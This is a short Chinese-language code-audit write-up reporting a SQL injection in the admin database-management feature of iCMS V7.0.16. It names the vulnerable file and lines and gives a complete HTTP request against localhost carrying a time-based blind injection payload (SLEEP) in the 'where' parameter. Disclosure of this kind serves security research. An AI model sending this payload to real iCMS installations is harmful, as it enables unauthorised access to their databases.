icms V7.0.16 后台数据管理处sql注入

Chubby

2023-08-01

代码审计

1、漏洞出现位置

2、有问题代码：database.admincp.php中的230行

3、219行传入的where参数，不经过过滤，直接带入230行中的sql执行语句

4、所以在参数where进行拼接，造成where条件句sql注入，尝试进行手工注入，数据包如下
POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq_XXz5vaYOwEoS_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
Connection: close
Referer: http://localhost/icms/admincp.php?app=database&do=replace
Cookie: iCMS_ADMIN_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC_CewgaX5uR1iNHfEz_Pj20qTaPC_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG_SESSION=11807
Upgrade-Insecure-Requests: 1

field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))testsql)

5、执行成功，效果如图：